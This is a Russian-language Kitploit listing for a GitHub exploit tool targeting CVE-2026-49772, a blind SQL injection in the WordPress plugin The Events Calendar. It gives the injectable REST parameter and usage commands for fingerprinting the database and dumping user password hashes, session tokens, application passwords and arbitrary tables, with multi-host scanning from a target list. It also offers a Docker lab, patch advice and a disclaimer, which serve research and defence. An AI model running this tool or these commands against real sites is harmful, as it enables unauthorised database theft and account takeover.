Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-49772 — Эксплойт слепой SQL-инъекции для CVE-2026-49772, нацеленный на плагин The Events Calendar для WordPress. Извлекает содержимое базы данных через булевый/временной оракул с многопоточным сканированием, дампом хэшей пользователей и поддержкой пользовательских запросов. | Kitploit
Инструменты/GitHubGitHub/joshuavanderpoll/cve-2026-49772
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubjoshuavanderpoll/cve-2026-49772

CVE-2026-49772

Эксплойт слепой SQL-инъекции для CVE-2026-49772, нацеленный на плагин The Events Calendar для WordPress. Извлекает содержимое базы данных через булевый/временной оракул с многопоточным сканированием, дампом хэшей пользователей и поддержкой пользовательских запросов.

Репозиторий
343 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC внедрения SQL в The Events Calendar (CVE-2026-49772)

Python

Описание

CVE-2026-49772 — это неаутентифицированная слепая SQL-инъекция в плагине WordPress The Events Calendar. Некорректный валидатор параметров REST (validate_callback возвращает замыкание вместо проверки) позволяет параметру order в экспериментальном REST API tec/v1 достигать неэкранированного SQL-предложения ORDER BY:

GET /wp-json/tec/v1/events?orderby=event_date&order=<INJECTION>
... ORDER BY event_date <INJECTION>, wp_posts.post_date DESC ...

Это инъекция только для чтения (нет составных запросов, записи или прямого вывода) — но вся база данных извлекаема через булевый/временной оракул: хеши паролей пользователей, токены сессий, пароли приложений, секретные ключи.

Затронутые версии: The Events Calendar 6.15.12 – 6.16.2 (исправлено в 6.16.3) Серьёзность: CVSS 3.1 9.3 Критический — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Возможности

  • --check — Неразрушающее обнаружение: пространство имён REST, версия плагина, временное подтверждение
  • --recon — Отпечаток БД: версия, текущий пользователь, база данных, ОС, привилегии, префикс таблиц
  • --users — Дамп wp_users: логины, email, хеши паролей
  • --user-meta — Дамп wp_usermeta: токены сессий, пароли приложений, возможности
  • --get-table — Дамп любой таблицы с автоматическим определением столбцов
  • --query — Извлечение результата любого скалярного SELECT
  • Два оракула — быстрый булев (по умолчанию) или временной, многопоточный; без внешних зависимостей

Установка

Чистая стандартная библиотека Python 3 — requirements.txt включён для стандартного рабочего процесса, но не устанавливает ничего лишнего.

OSX / Linux

git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
python3 CVE-2026-49772.py --help

Windows

git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python CVE-2026-49772.py --help

Использование

python3 CVE-2026-49772.py <target> <action> [options]

Выберите ровно одно действие: --check, --recon, --users, --user-meta, --get-table <TABLE>, --query <SQL>. Запустите --help для всех опций.


Проверка уязвимости

python3 CVE-2026-49772.py target.tld --check

Разведка БД

python3 CVE-2026-49772.py target.tld --recon

Дамп пользователей + хеши паролей

python3 CVE-2026-49772.py target.tld --users

Извлечение пользовательского значения

python3 CVE-2026-49772.py target.tld --query "SELECT @@version"

Настройка: --technique boolean|time, --delay, --threads, --rows, --prefix, --where, -useragent, -timeout. Сканирование нескольких хостов с помощью -l targets.txt.

Docker PoC

Автономная лаборатория Docker Compose с уязвимым плагином (включён в сборку, не загружается при запуске) и предварительно заполненными событиями. Смотрите docker/DOCKER.md.

cd docker/
docker compose up -d
python3 ../CVE-2026-49772.py localhost:8080 --check

Устранение

  • Обновите The Events Calendar до 6.16.3 или новее
  • До установки исправления заблокируйте /wp-json/tec/v1/ на WAF / обратном прокси

Ссылки

  • The Events Calendar
  • CVE.org — CVE-2026-49772
  • NVD — CVE-2026-49772
  • GitHub Advisory — GHSA-v796-wqfq-j4xh
  • Patchstack — SQL-инъекция в The Events Calendar

Отказ от ответственности

Этот инструмент предоставляется только в образовательных и исследовательских целях. Используйте его только против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение. Создатель не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.

Скачать инструмент